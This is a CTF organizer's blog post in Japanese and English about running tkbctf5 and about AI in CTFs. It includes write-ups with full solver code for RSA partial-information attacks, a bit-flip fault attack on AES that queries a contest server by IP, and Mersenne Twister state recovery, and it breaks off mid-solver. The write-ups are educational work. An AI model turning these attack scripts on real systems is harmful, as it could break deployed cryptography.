tkbctf5

2026/03/18

#CTF#tkbctf

2026年3月14日から15日にかけてtkbctf5というCTFを開催しました。

構想は1年ほど前にkeymoonさんとラーメン屋に行く道中で話していたところから始まりました。TPCの中で声を掛け、最終的に7人のチームで作問・運営をしました。 organizerはTPCなのでTPC CTFかなと思っていたんですが、筑波大学には2014年まで4回開催されていたtkbctfというCTFがあり、復活させたら面白いんじゃないかという話になり、tkbctf5という名前になりました。快く名前を使わせていただいた旧tkbctfのorganizerチームの皆様にはこの場を借りて改めてお礼申し上げます。

結果として、185チームに参加（1ポイント以上を獲得したチーム）していただきました。

最終的な順位表

コンテスト開催前はどうなることかとヒヤヒヤしていましたが、各分野ボス問は2solves以下となり、その他の問題も含めて想像以上にAI・人類両方に苦戦して頂けたようでした。フィードバックも概ね好評で、死にそうになりながら運営した甲斐がありました。

CTFとAIの情勢や問題ストックの関係で来年以降開催できるかは一切分かりませんが、開催できるようであればtkbctf6も続けて開催したいと思います。

コンテストサイトについて

コンテストサイトとして、keymoonらが運営しているAlpacaHackを使わせていただくことになりました。AlpacaHackでやったらおもろいやろというのと、終了後の常設化がやりやすいこと、インフラ周りを見知っており扱いやすいであろうことなどが理由です。前々からチーム戦機能はあると良いよねという話だったらしく、これを機にAlpacaHackにチーム戦機能を実装することになりました。しかしダラダラと後回しにしていった結果、一週間前から機能開発を始め、コンテストページを公開したのは開催3日前とかなりギリギリになってしまいました。

スポンサーについて

SECCONの時にFlatt Security様からスポンサーに前向きなお話をいただいたんですが、送金が面倒そうなこと、賞金目的で参加するチームはそう多くなさそうなことから、賞金なしで開催することにしました。しかしよく考えると、SECCON 14の優勝などもあり国内ではそれなりに名前の知れたチームになっているものの、海外から見ると賞金もなく前回開催が12年前の謎のCTFがまともだとは誰も思わないと思います。

CTFとAIについての話

昨今AIのCTF力が急速に上がっており、周りでもCTFは終わりだみたいな話題がよく上がるようになってきました。競技プログラミングはAIを禁止することで存続する道に進んでいくことができていそうですが、やはりCTFは競技の性質上AIを禁止するということでコミュニティ全体の合意を取ることは不可能だろうと思います。

今回私が作問したいくつかの問題、特にYajirinは、AIだけではまず解けない一方で人類だけで解くのも24時間ではかなり難しく、AIと上手く協働してください、というのが想定した解き筋でした。この問題が誰にも解かれなかったことは、（単純に取り組んだプレイヤーが少なかったのも原因の一つだとは思いますが）AIを使いこなすというのが競技として成立する程度に難しいことの証左になったのではないかと思います。この問題程度であれば今後1年もあればAIでoneshotできるようになるかもしれませんが、その時になってもAIに丸投げするのとAIを使いこなすので出力に差が生まれることは変わらないと思っています。ただ、「使いこなす」というのが具体的に何なのかはまだ私にはよくわかりません。誰か教えてください。

CTFの競技としての側面が失われてもCTFというコンテンツの面白さは失われていません。娯楽としてのCTFはむしろAIがなんでも解説してくれることによってより面白くなっているのではないでしょうか？ Daily AlpacaHackがまさに娯楽としてのCTFの面白さを得ることに特化したコンテンツであり、私も毎日楽しみにしています。こういうのが盛り上がっていくといいなと思います。

とにかく、私はもう少しCTFを続けていくつもりです。

作問した問題

私はcryptoを7問、reversingを2問、webを1問、miscを3問、rev-miscを1問作問しました。 cryptoはコツコツ貯めていた作問ストックからある程度バランスをみて出題したつもりですが、後半に変に大変な問題が多くなってしまったような認識はあります。本当はペアリングとかのガッツリ数学な高難易度の問題を出したかったところですが、数学力が足りませんでした。精進します。

以下、私の作問した問題の解説になります。

This English version was translated by Claude.

We held tkbctf5, a CTF, over March 14-15, 2026.

The idea began about a year before when keymoon and I were talking on the way to a ramen restaurant. I reached out to members of TPC, and ultimately a team of 7 people worked on challenge creation and operations. Since the organizer is TPC, I initially thought it might be called TPC CTF, but someone pointed out that there was a CTF called tkbctf held 4 times at the University of Tsukuba through 2014, and that it would be interesting to revive it — so we went with the name tkbctf5. I would like to take this opportunity to express my gratitude to the members of the original tkbctf organizer team for kindly allowing us to use the name.

As a result, 185 teams participated (teams that earned at least 1 point).

Final scoreboard

Before the contest I was quite nervous about how it would go, but the boss challenges in each category ended up with 2 or fewer solves, and it seems that both AI and humans struggled more than I expected across the board. The feedback was largely positive, and it made all the near-death operating experience worthwhile.

Whether we can hold another event in future years is entirely unclear, given the state of CTF and AI and our challenge stockpiles, but if we can, I hope to hold tkbctf6 next year as well.

About the Contest Site

We ended up using AlpacaHack, run by keymoon and others, as the contest platform. The reasoning was that running it on AlpacaHack seemed fun, it would be easy to keep the challenges up permanently after the contest ended, and we were familiar with the infrastructure and expected it to be manageable. Apparently there had long been talk about how team competition support would be nice to have, and this became the occasion to implement team functionality in AlpacaHack. However, as we kept putting it off, feature development didn't start until one week before the contest, and the contest page wasn't published until three days before — cutting it quite close.

About Sponsorship

At SECCON, Flatt Security generously indicated they would be interested in sponsoring, but I decided to proceed without prize money, thinking that the logistics of payment were complicated and that not many teams would participate specifically for prize money. However, on reflection, while we might be somewhat well-known domestically given achievements like winning SECCON 14, from an international perspective, no one would expect much from a mysterious CTF with no prizes and a previous edition 12 years ago.

On CTF and AI

AI's ability to solve CTF challenges has been rising rapidly lately, and conversations about "CTF is dying" have become increasingly common in my surroundings. Competitive programming seems to be finding a path forward by banning AI, but I think it's fundamentally impossible to get community-wide consensus on banning AI from CTF, given the nature of the competition.

Several of the challenges I created this time — Yajilin in particular — were designed so that AI alone would almost certainly not be able to solve them, while humans alone would also find them quite difficult within 24 hours; the intended approach was to collaborate effectively with AI. That this challenge went unsolved (though I think part of the reason is simply that few players attempted it) may be evidence that "using AI skillfully" is difficult enough to constitute a meaningful competitive dimension. Within the next year or so, AI might be able to one-shot challenges at this level, but I believe that even then, there will still be a gap in output between blindly delegating to AI and truly leveraging it. Though I still don't quite understand concretely what "leveraging" means. Someone please tell me.

Even if CTF's competitive aspect fades, the fun of CTF as content doesn't disappear. If anything, CTF as entertainment may have become more enjoyable, now that AI can explain anything. Daily AlpacaHack is precisely a format optimized for getting that entertainment value out of CTF, and I look forward to it every day. I hope to see this flourish.

In any case, I intend to keep doing CTF for a while longer.

Challenges I Created

I created 7 crypto challenges, 2 reversing challenges, 1 web challenge, 3 misc challenges, and 1 rev-misc challenge. For crypto, I tried to balance the selection from my accumulated stockpile, though I feel there were somewhat more oddly demanding challenges toward the end. I really wanted to include some harder, heavily mathematical challenges involving things like pairings, but my mathematical skills weren't up to it — I'll keep working on that.

Below are write-ups for the challenges I created.

crypto

Single Hint RSA (111 solves)

問題

次のスクリプトとその実行結果が与えられます。

import os
from math import gcd
from Crypto.Util.number import getPrime, bytes_to_long
 
e = 11
flag = os.environ.get("FLAG", f"tkbctf{{{"dummy"*24}}}")
flag = flag.removeprefix("tkbctf{").removesuffix("}").encode()
assert len(flag) == 120
m = bytes_to_long(flag)
p = getPrime(512)
q = getPrime(512)
assert gcd((p - 1) * (q - 1), e) == 1
n = p * q
c = pow(m, e, n)
hint1 = n % m
 
print(f"{n=}")
print(f"{e=}")
print(f"{c=}")
print(f"{hint1=}")

解法

追加で hint1 = n % m が与えられています。これは $k = \lfloor n/m \rfloor$ を用いて $n = k m + \mathrm{hint1}$ の形に書けるので、 $n - \mathrm{hint1} = k m$ が成り立ちます。

暗号文は $c = m^e \bmod n$ なので、両方を使って $(n - \mathrm{hint1})^e \cdot c^{-1} \equiv (k m)^e \cdot m^{-e} \equiv k^e \pmod n$ を作れます。つまり $k^e \bmod n$ が得られます。

ここで、 $k$ の大きさを見積もってみましょう。 $m$ は 120 bytes (= 960 bit) で、 $n$ は 1024 bit 程度なので、 $k = \lfloor n/m \rfloor \approx 2^{64}$ とかなり小さい値です。 $e = 11$ なので $k^e$ は高々 $2^{64\cdot 11} = 2^{704}$ 程度になり、 $n$ と比べても小さい値となっていることがわかります。よって $k^e \bmod n$ は $k^e$ と等しくなっており、ここから $e$ 乗根を取れば $k$ が復元できます。

$k$ が分かれば $m = (n - \mathrm{hint1}) \cdot k^{-1} \pmod n$ で $m$ を復元し、long_to_bytes でフラグが得られます。

ソルバは以下のようになります。

from sympy import integer_nthroot
from Crypto.Util.number import long_to_bytes
import ast
 
with open("../distfiles/output.txt", "r") as f:
    n = ast.literal_eval(f.readline().removeprefix("n="))
    e = ast.literal_eval(f.readline().removeprefix("e="))
    c = ast.literal_eval(f.readline().removeprefix("c="))
    hint1 = ast.literal_eval(f.readline().removeprefix("hint1="))
 
t = pow(n - hint1, e, n) * pow(c, -1, n) % n
k, _ = integer_nthroot(t, e)
m = (n - hint1) * pow(k, -1, n) % n
print(long_to_bytes(m))

crypto

Single Hint RSA (111 solves)

Challenge

The following script and its output are given.

import os
from math import gcd
from Crypto.Util.number import getPrime, bytes_to_long
 
e = 11
flag = os.environ.get("FLAG", f"tkbctf{{{"dummy"*24}}}")
flag = flag.removeprefix("tkbctf{").removesuffix("}").encode()
assert len(flag) == 120
m = bytes_to_long(flag)
p = getPrime(512)
q = getPrime(512)
assert gcd((p - 1) * (q - 1), e) == 1
n = p * q
c = pow(m, e, n)
hint1 = n % m
 
print(f"{n=}")
print(f"{e=}")
print(f"{c=}")
print(f"{hint1=}")

Solution

An additional hint1 = n % m is given. Using $k = \lfloor n/m \rfloor$ , this can be written as $n = k m + \mathrm{hint1}$ , so $n - \mathrm{hint1} = k m$ holds.

Since the ciphertext is $c = m^e \bmod n$ , we can combine both to obtain $(n - \mathrm{hint1})^e \cdot c^{-1} \equiv (k m)^e \cdot m^{-e} \equiv k^e \pmod n$ . That is, we can obtain $k^e \bmod n$ .

Let us estimate the size of $k$ . Since $m$ is 120 bytes (= 960 bits) and $n$ is about 1024 bits, $k = \lfloor n/m \rfloor \approx 2^{64}$ , which is a fairly small value. Since $e = 11$ , $k^e$ is at most about $2^{64 \cdot 11} = 2^{704}$ , which is smaller than $n$ . Therefore, $k^e \bmod n$ equals $k^e$ itself, and we can recover $k$ by taking the $e$ -th root.

Once $k$ is known, we recover $m = (n - \mathrm{hint1}) \cdot k^{-1} \pmod n$ and obtain the flag with long_to_bytes.

The solver is as follows.

from sympy import integer_nthroot
from Crypto.Util.number import long_to_bytes
import ast
 
with open("../distfiles/output.txt", "r") as f:
    n = ast.literal_eval(f.readline().removeprefix("n="))
    e = ast.literal_eval(f.readline().removeprefix("e="))
    c = ast.literal_eval(f.readline().removeprefix("c="))
    hint1 = ast.literal_eval(f.readline().removeprefix("hint1="))
 
t = pow(n - hint1, e, n) * pow(c, -1, n) % n
k, _ = integer_nthroot(t, e)
m = (n - hint1) * pow(k, -1, n) % n
print(long_to_bytes(m))

crypto

Double Hint RSA (28 solves)

問題

次のスクリプトとその実行結果が与えられます。

import os
from math import gcd
from Crypto.Util.number import getPrime, bytes_to_long
 
e = 11
flag = os.environ.get("FLAG", f"tkbctf{{{"dummy"*12}}}")
flag = flag.removeprefix("tkbctf{").removesuffix("}").encode()
assert len(flag) == 60
m = bytes_to_long(flag)
p = getPrime(512)
q = getPrime(512)
assert gcd((p - 1) * (q - 1), e) == 1
n = p * q
c = pow(m, e, n)
hint1 = n % m
hint2 = n % (m + e)
 
print(f"{n=}")
print(f"{e=}")
print(f"{c=}")
print(f"{hint1=}")
print(f"{hint2=}")

解法

Single Hint RSA と比べて hint2 = n % (m + e) の出力が追加されています。加えて、平文の長さが 120 bytes から 60 bytes に短くなっています。単にヒントが増えているだけのように思えますが、Single Hint RSA の解法はそのままでは使えません。Single Hint RSA では $m$ が長く $k = \lfloor n/m \rfloor$ が十分小さいため、 $k^e$ が $n$ より小さくなりそのまま取り出せました。一方今回は $m$ が半分の長さになったことで $k$ が大きくなり、 $k^e$ は $n$ を大きく超えます。よって $k^e \bmod n$ から直接 $k$ を復元する流れは成立しません。

多項式の構成

$k := \lfloor n/m \rfloor$ とおくと $n = km + \mathrm{hint1}$ が厳密に成り立ちます。同様に $\ell := \lfloor n/(m+e) \rfloor$ とおくと $n = \ell(m+e) + \mathrm{hint2}$ も成り立ちます。ここで $d := k - \ell$ とおくと、次の 3 式が得られます。

$\begin{cases} km + \mathrm{hint1} - n = 0 & \cdots (1) \\ (k-d)(m+e) + \mathrm{hint2} - n = 0 & \cdots (2) \\ m^e - c \equiv 0 \pmod{n} & \cdots (3) \end{cases}$

ここで $d = k - \ell$ は $2^{70}$ 程度とかなり小さい値となることが実験で確かめられます。

変数消去

$(1)(2)$ から $k$ を消去します。手計算で丁寧に計算してもよいですが、こういった多項式の変数消去には終結式（resultant）という道具が使えます。SageMath では f.resultant(g, x) とすると使えます。

$k$ を消去すると $d, m$ だけの多項式が得られます。

$f(d, m) = -dm(m+e) + (\mathrm{hint2} - \mathrm{hint1})m - \mathrm{hint1} \cdot e + ne = 0 \quad \cdots (4)$

Multivariate Coppersmith を使う方法

$(4)$ と $(3)$ を連立した 2 変数問題として Multivariate Coppersmith を適用すると、 $m \approx 2^{480}$ 、 $d \approx 2^{70}$ という小さい共通根 $(d, m)$ を求めることができます。

keeganryan/cuso というライブラリを使うと複数の多項式と変数の上下界を渡すだけで小さい根を探索できます。

Multivariate Coppersmith は内部で使う shift polynomial の構成方法により解ける範囲が変わります。cuso は適切な構成を自動探索するため、defund/coppersmith のような簡単な構成を行うライブラリより広い範囲の問題を解くことができます。この問題も defund/coppersmith では解けない範囲に設定されています。

ソルバは以下のようになります。

ソルバ（cuso 版・クリックで展開）

from sage.all import *
from Crypto.Util.number import long_to_bytes, bytes_to_long
import ast
import cuso
 
with open("../distfiles/output.txt", "r") as f:
    n = ast.literal_eval(f.readline().removeprefix("n="))
    e = ast.literal_eval(f.readline().removeprefix("e="))
    c = ast.literal_eval(f.readline().removeprefix("c="))
    hint1 = ast.literal_eval(f.readline().removeprefix("hint1="))
    hint2 = ast.literal_eval(f.readline().removeprefix("hint2="))
 
mlb = bytes_to_long(b"\x20"*60)
mub = bytes_to_long(b"\x80"*60)
 
PR = PolynomialRing(ZZ, "k, d, m")
k, d, m = PR.gens()
f1 = k*m+hint1
f2 = (k-d)*(m+e)+hint2
f3 = m**e-c
f = f1.resultant(f2, k)
g = f.resultant(f3, m)
 
PR2 = PolynomialRing(Zmod(n), "d, m")
f = PR2(f)
g = PR2(g)
 
roots = cuso.find_small_roots(
    [f, g],
    bounds={
        m: (mlb, mub),
        d: (n//mub-n//(mub+e), n//mlb-n//(mlb+e)),
    }
)
 
for root in roots:
    print(long_to_bytes(root[m]))

一変数 Coppersmith に帰着する方法

が、よく考えると $(4)$ と $(3)$ から更に $m$ を削除すると $d$ の1変数多項式が得られるので、そこから普通にCoppersmithを使うと解けます。コンテストが終わるまで気づきませんでした……

$h(d) := \mathrm{Res}_m(f, m^e - c) \equiv 0 \pmod{n}$

$h(d)$ は $d$ について 11 次の多項式で、 $d \approx 2^{70} < n^{1/11} \approx 2^{93}$ なので Coppersmith の適用条件を満たします。 $d$ が求まれば $(4)$ に代入して $m$ についての 2 次多項式を解けば $m$ が得られます。

PR = PolynomialRing(ZZ, "k, d, m")
k, d, m = PR.gens()
f1 = k*m+hint1-n
f2 = (k-d)*(m+e)+hint2-n
f3 = m**e-c
f = f1.resultant(f2, k)  # f(d,m) ≡ 0 (mod n)
g = f.resultant(f3, m)   # h(d) ≡ 0 (mod n)
 
h = g.univariate_polynomial().change_ring(Zmod(n)).monic()
rec_d = ZZ(h.small_roots(X=2**72, epsilon=0.02)[0])
 
h = f.subs(d=rec_d).univariate_polynomial()
rec_m = h.roots()[0][0]
print(long_to_bytes(rec_m))

crypto

Double Hint RSA (28 solves)

Challenge

The following script and its output are given.

import os
from math import gcd
from Crypto.Util.number import getPrime, bytes_to_long
 
e = 11
flag = os.environ.get("FLAG", f"tkbctf{{{"dummy"*12}}}")
flag = flag.removeprefix("tkbctf{").removesuffix("}").encode()
assert len(flag) == 60
m = bytes_to_long(flag)
p = getPrime(512)
q = getPrime(512)
assert gcd((p - 1) * (q - 1), e) == 1
n = p * q
c = pow(m, e, n)
hint1 = n % m
hint2 = n % (m + e)
 
print(f"{n=}")
print(f"{e=}")
print(f"{c=}")
print(f"{hint1=}")
print(f"{hint2=}")

Solution

Compared to Single Hint RSA, the output of hint2 = n % (m + e) is added. Additionally, the plaintext length is halved from 120 bytes to 60 bytes. It may seem like we simply have more hints, but the Single Hint RSA solution does not apply directly. In Single Hint RSA, $m$ was long and $k = \lfloor n/m \rfloor$ was small enough that $k^e$ was smaller than $n$ and could be extracted directly. This time, however, since $m$ is half the length, $k$ becomes larger, and $k^e$ greatly exceeds $n$ . Therefore, the approach of recovering $k$ directly from $k^e \bmod n$ does not work.

Constructing the Polynomials

Let $k := \lfloor n/m \rfloor$ , so $n = km + \mathrm{hint1}$ holds exactly. Similarly, let $\ell := \lfloor n/(m+e) \rfloor$ , so $n = \ell(m+e) + \mathrm{hint2}$ holds. Setting $d := k - \ell$ , we obtain the following three equations:

$\begin{cases} km + \mathrm{hint1} - n = 0 & \cdots (1) \\ (k-d)(m+e) + \mathrm{hint2} - n = 0 & \cdots (2) \\ m^e - c \equiv 0 \pmod{n} & \cdots (3) \end{cases}$

Experiments confirm that $d = k - \ell$ is about $2^{70}$ , a fairly small value.

Variable Elimination

We eliminate $k$ from $(1)$ and $(2)$ . You can compute this by hand, but for polynomial variable elimination we can use the resultant. In SageMath, f.resultant(g, x) can be used.

Eliminating $k$ gives a polynomial in $d$ and $m$ only:

$f(d, m) = -dm(m+e) + (\mathrm{hint2} - \mathrm{hint1})m - \mathrm{hint1} \cdot e + ne = 0 \quad \cdots (4)$

Solving with Multivariate Coppersmith

Applying Multivariate Coppersmith to the two-variable challenge formed by $(4)$ and $(3)$ together, we can find the small common root $(d, m)$ where $m \approx 2^{480}$ and $d \approx 2^{70}$ .

Using the library keeganryan/cuso, we can search for small roots by just providing multiple polynomials and upper/lower bounds on the variables.

The solvable range in Multivariate Coppersmith depends on how the shift polynomials are constructed internally. Since cuso automatically searches for an appropriate construction, it can solve a wider range of problems than libraries like defund/coppersmith that use simpler constructions. This challenge is also set outside the range solvable by defund/coppersmith.

The solver is as follows.

Solver (cuso version, click to expand)

from sage.all import *
from Crypto.Util.number import long_to_bytes, bytes_to_long
import ast
import cuso
 
with open("../distfiles/output.txt", "r") as f:
    n = ast.literal_eval(f.readline().removeprefix("n="))
    e = ast.literal_eval(f.readline().removeprefix("e="))
    c = ast.literal_eval(f.readline().removeprefix("c="))
    hint1 = ast.literal_eval(f.readline().removeprefix("hint1="))
    hint2 = ast.literal_eval(f.readline().removeprefix("hint2="))
 
mlb = bytes_to_long(b"\x20"*60)
mub = bytes_to_long(b"\x80"*60)
 
PR = PolynomialRing(ZZ, "k, d, m")
k, d, m = PR.gens()
f1 = k*m+hint1
f2 = (k-d)*(m+e)+hint2
f3 = m**e-c
f = f1.resultant(f2, k)
g = f.resultant(f3, m)
 
PR2 = PolynomialRing(Zmod(n), "d, m")
f = PR2(f)
g = PR2(g)
 
roots = cuso.find_small_roots(
    [f, g],
    bounds={
        m: (mlb, mub),
        d: (n//mub-n//(mub+e), n//mlb-n//(mlb+e)),
    }
)
 
for root in roots:
    print(long_to_bytes(root[m]))

Reducing to Univariate Coppersmith

However, on reflection, further eliminating $m$ from $(4)$ and $(3)$ yields a univariate polynomial in $d$ , from which we can apply Coppersmith directly. I didn't notice this until after the contest...

$h(d) := \mathrm{Res}_m(f, m^e - c) \equiv 0 \pmod{n}$

$h(d)$ is a degree-11 polynomial in $d$ , and since $d \approx 2^{70} < n^{1/11} \approx 2^{93}$ , the conditions for applying Coppersmith are satisfied. Once $d$ is found, substituting into $(4)$ and solving the resulting quadratic in $m$ gives $m$ .

PR = PolynomialRing(ZZ, "k, d, m")
k, d, m = PR.gens()
f1 = k*m+hint1-n
f2 = (k-d)*(m+e)+hint2-n
f3 = m**e-c
f = f1.resultant(f2, k)  # f(d,m) ≡ 0 (mod n)
g = f.resultant(f3, m)   # h(d) ≡ 0 (mod n)
 
h = g.univariate_polynomial().change_ring(Zmod(n)).monic()
rec_d = ZZ(h.small_roots(X=2**72, epsilon=0.02)[0])
 
h = f.subs(d=rec_d).univariate_polynomial()
rec_m = h.roots()[0][0]
print(long_to_bytes(rec_m))

crypto

Faulty AES (61 solves)

問題

次のようなサーバが与えられます。

import inspect
import os
import hashlib
# https://github.com/boppreh/aes/blob/master/aes.py
import aes
 
flag = os.environ.get("FLAG", "tkbctf{dummy}")
hash_val = hashlib.sha256(flag.encode()).digest()
key, msg = hash_val[:16], hash_val[16:]
 
pos = int(input("pos: "))
source = bytearray(inspect.getsource(aes), "utf-8")
source[pos // 8] ^= 1 << (pos % 8)
exec(bytes(source), aes.__dict__)
 
print("ct:", aes.AES(key).encrypt_block(msg).hex())
if bytes.fromhex(input("hash: ")) == hash_val:
    print(flag)
else:
    print("wrong")

pos で指定したビットだけ反転したソースコードで aes モジュールが上書きされ、その実装でencrypt_blockが実行されています。hash_val = sha256(flag) がそのまま key || msg になっているので、key と msg が分かればフラグが得られます。

aes.py は GitHub 上に公開されている AES 実装（boppreh/aes）で、実装にバグは無さそうです。

解法

1 回の接続につき 1 ビットだけ AES 実装を壊すことができますが、計算したい key と msg は何度接続しても同じ値であることから、複数回接続し、それぞれ別の箇所を壊すことによって多くの情報を得ることができます。

1. `add_round_key` を無効化して `msg` を復元する

64行目のadd_round_key関数内の for i in range(4): を書き換えます。 '4' = 0x34 と '0' = 0x30 の差は 1 bit なので、対応する bit を反転すれば range(4) を range(0) にすることができます。add_round_key は 4x4 の全バイトに XOR をかける処理なので、このループが 0 回になると「鍵加算を何もしない関数」になり、暗号文は鍵に依存しない固定変換になります。よって、得られた暗号文に対して AES の逆変換を適用すると msg を復元できます。

2. ラウンド数を 0 にして `key` を復元する

rounds_by_key_size の 16: 10 の 1 を 0 に変えて 16: 00 にすると、ラウンド数が 0 になります（'1' = 0x31 と '0' = 0x30 も 1 bit だけ違います）。このとき暗号化は ct = ShiftRows(SubBytes(msg ^ key)) ^ key という形になり、ct と msg が既知なので key に関する式が得られます。

この方程式の解き方は 2 通りあります。

z3 を使う方法

16 バイトの key をそのまま z3 の BitVec に置き、上の式をそのまま制約として解けば復元できます。

z3 を使わない方法

MixColumns が無いので、ShiftRows によって列ごとに 4 バイトが巡回するだけになり、各列は独立に解けます。列 j について 4 本の式が得られ、j=0 は各バイト独立、j=1,3 は 4 バイトのサイクル、j=2 は 2 バイトずつの入れ替わりになります。1 バイトを仮定して他を順に決めることで各列の候補が列挙でき、4 列の組み合わせで key 候補が得られます。

最後に、候補ごとに hash = key || msg を送って検証すればフラグが得られます。

ソルバは以下の通りです。z3を使って解いています。

ソルバ（クリックで展開）

import sys
from pwn import *
from z3 import *
import inspect
 
import aes
 
def oracle(idx, h=None):
    with remote("35.194.108.145", 54140) as sc:
        sc.sendlineafter(b"pos: ", str(idx).encode())
        sc.recvuntil(b"ct: ")
        ct = bytes.fromhex(sc.recvline().decode())
        if h is not None:
            sc.sendlineafter(b"hash: ", h.hex().encode())
            return sc.recvline()
        return ct
 
 
source = bytearray(inspect.getsource(aes), "utf-8")
 
ct1 = oracle(source.index(b"for i in range(4):", source.index(b"add_round_key")) * 8 + 122) # for i in range(0):
ct2 = oracle(source.index(b"{16: 10, ") * 8 + 40) # {16: 00,
 
def decrypt_block(ciphertext):
    cipher_state = aes.bytes2matrix(ciphertext)
    aes.inv_shift_rows(cipher_state)
    aes.inv_sub_bytes(cipher_state)
    for i in range(9, 0, -1):
        aes.inv_mix_columns(cipher_state)
        aes.inv_shift_rows(cipher_state)
        aes.inv_sub_bytes(cipher_state)
    return aes.matrix2bytes(cipher_state)
pt = decrypt_block(ct1)
 
s = Solver()
subF = Function("subByte_f", BitVecSort(8), BitVecSort(8))
for i in range(256):
    s.add(subF(i) == aes.s_box[i])
key_sym = [BitVec(f"key_{i}", 8) for i in range(16)]
 
perm = [0, 5, 10, 15, 4, 9, 14, 3, 8, 13, 2, 7, 12, 1, 6, 11]
state = [pt[i] ^ key_sym[i] for i in range(16)]
state = [subF(v) for v in state]
state = [state[i] for i in perm]
state = [state[i] ^ key_sym[i] for i in range(16)]
 
for i in range(16):
    s.add(state[i] == ct2[i])
while s.check() == sat:
    m = s.model()
    rec_key = [m[i].as_long() for i in key_sym]
 
    print(rec_key)
 
    res = oracle(source.index(b"# learned") * 8 + 8, h=bytes(rec_key)+pt)
    print(res)
    if b"wrong" not in res:
        break
    s.add(Or([rec_key[i] != key_sym[i] for i in range(16)]))

crypto

Faulty AES (61 solves)

Challenge

The following server is given.

import inspect
import os
import hashlib
# https://github.com/boppreh/aes/blob/master/aes.py
import aes
 
flag = os.environ.get("FLAG", "tkbctf{dummy}")
hash_val = hashlib.sha256(flag.encode()).digest()
key, msg = hash_val[:16], hash_val[16:]
 
pos = int(input("pos: "))
source = bytearray(inspect.getsource(aes), "utf-8")
source[pos // 8] ^= 1 << (pos % 8)
exec(bytes(source), aes.__dict__)
 
print("ct:", aes.AES(key).encrypt_block(msg).hex())
if bytes.fromhex(input("hash: ")) == hash_val:
    print(flag)
else:
    print("wrong")

The aes module is overwritten with source code that has the bit specified by pos flipped, and encrypt_block is executed using that implementation. Since hash_val = sha256(flag) directly becomes key || msg, knowing key and msg gives us the flag.

aes.py is an AES implementation (boppreh/aes) published on GitHub, and the implementation appears to have no bugs.

Solution

Per connection, only 1 bit of the AES implementation can be broken. However, since the key and msg we want to compute are the same across multiple connections, we can obtain a lot of information by connecting multiple times and breaking different parts each time.

1. Disable `add_round_key` to recover `msg`

We rewrite the for i in range(4): inside the add_round_key function on line 64. Since '4' = 0x34 and '0' = 0x30 differ by 1 bit, flipping the corresponding bit changes range(4) to range(0). Since add_round_key XORs all bytes of the 4×4 state with the key, making this loop run 0 times turns it into a function that does nothing, making the ciphertext a fixed transformation independent of the key. Therefore, applying the inverse AES transformation to the obtained ciphertext recovers msg.

2. Set the round count to 0 to recover `key`

Changing 16: 10 in rounds_by_key_size by turning the 1 to 0, giving 16: 00, sets the round count to 0 (since '1' = 0x31 and '0' = 0x30 also differ by only 1 bit). In this case, encryption becomes ct = ShiftRows(SubBytes(msg ^ key)) ^ key, and since ct and msg are known, we get an equation in key.

There are two ways to solve this equation.

Using z3

Place key (16 bytes) directly as z3 BitVec variables and solve using the above equation as the constraint.

Without z3

Since there is no MixColumns, ShiftRows only cycles 4 bytes per column, and each column can be solved independently. For column j, we get 4 equations; j=0 is independent per byte, j=1,3 is a 4-byte cycle, and j=2 is a pair swap. By assuming one byte and determining the others in sequence, candidates for each column can be enumerated, and combinations across 4 columns give key candidates.

Finally, for each candidate, send hash = key || msg to verify and obtain the flag.

The solver is as follows. It uses z3 to solve.

Solver (click to expand)

import sys
from pwn import *
from z3 import *
import inspect
 
import aes
 
def oracle(idx, h=None):
    with remote("35.194.108.145", 54140) as sc:
        sc.sendlineafter(b"pos: ", str(idx).encode())
        sc.recvuntil(b"ct: ")
        ct = bytes.fromhex(sc.recvline().decode())
        if h is not None:
            sc.sendlineafter(b"hash: ", h.hex().encode())
            return sc.recvline()
        return ct
 
 
source = bytearray(inspect.getsource(aes), "utf-8")
 
ct1 = oracle(source.index(b"for i in range(4):", source.index(b"add_round_key")) * 8 + 122) # for i in range(0):
ct2 = oracle(source.index(b"{16: 10, ") * 8 + 40) # {16: 00,
 
def decrypt_block(ciphertext):
    cipher_state = aes.bytes2matrix(ciphertext)
    aes.inv_shift_rows(cipher_state)
    aes.inv_sub_bytes(cipher_state)
    for i in range(9, 0, -1):
        aes.inv_mix_columns(cipher_state)
        aes.inv_shift_rows(cipher_state)
        aes.inv_sub_bytes(cipher_state)
    return aes.matrix2bytes(cipher_state)
pt = decrypt_block(ct1)
 
s = Solver()
subF = Function("subByte_f", BitVecSort(8), BitVecSort(8))
for i in range(256):
    s.add(subF(i) == aes.s_box[i])
key_sym = [BitVec(f"key_{i}", 8) for i in range(16)]
 
perm = [0, 5, 10, 15, 4, 9, 14, 3, 8, 13, 2, 7, 12, 1, 6, 11]
state = [pt[i] ^ key_sym[i] for i in range(16)]
state = [subF(v) for v in state]
state = [state[i] for i in perm]
state = [state[i] ^ key_sym[i] for i in range(16)]
 
for i in range(16):
    s.add(state[i] == ct2[i])
while s.check() == sat:
    m = s.model()
    rec_key = [m[i].as_long() for i in key_sym]
 
    print(rec_key)
 
    res = oracle(source.index(b"# learned") * 8 + 8, h=bytes(rec_key)+pt)
    print(res)
    if b"wrong" not in res:
        break
    s.add(Or([rec_key[i] != key_sym[i] for i in range(16)]))

crypto

RANDOM IN THE FUTURE. (24 solves)

問題

次のスクリプトとその実行結果が与えられます。

import random
import os
from Crypto.Util.Padding import pad
from Crypto.Cipher import AES
 
flag = os.environ.get("FLAG", "tkbctf{dummy}")
a = b = 1
for _ in range(100):
    print(random.getrandbits(b))
    a, b = b, a + b
print(AES.new(random.randbytes(16), AES.MODE_ECB).encrypt(pad(flag.encode(), 16)).hex())

長さ $100$ のフィボナッチ数列 $1,2,3,5,8,\cdots$ に対してrandom.getrandbits(b)が呼ばれ、最後に random.randbytes(16) で作られた鍵によってフラグが暗号化されています。最終的なrandomの内部状態が復元できればよいですが、出力の後ろ80個は隠されています。最初の20個の出力から内部状態を復元し、80回分の状態を進める、というのが基本的な方針になりそうです。

1. 線形方程式から状態候補を列挙する

Python の random は MT19937 というアルゴリズムが使われています。MT19937 は 32bit 出力を生成する擬似乱数生成器で、内部状態は 624 個の 32bit 整数からなります。状態更新、出力のtemperがそれぞれGF(2)上の線形な演算で表せるため、MT19937 は出力が初期の内部状態19937bitの線形結合として表せるという性質を持っています。よって、得られている各出力ビットごとに初期の内部状態を変数とする1つの線形方程式が立ち、すべての出力ビットを合わせて線形方程式系が得られます。この線形方程式系を解くことで、内部状態の候補を列挙できます。

gf2bvというライブラリを使うと、以下のように簡単に線形方程式系を解くことができます。

from gf2bv import LinearSystem
from gf2bv.crypto.mt import MT19937
 
lin = LinearSystem([32] * 624)
mt = lin.gens()
rng = MT19937(mt)
 
a = b = 1
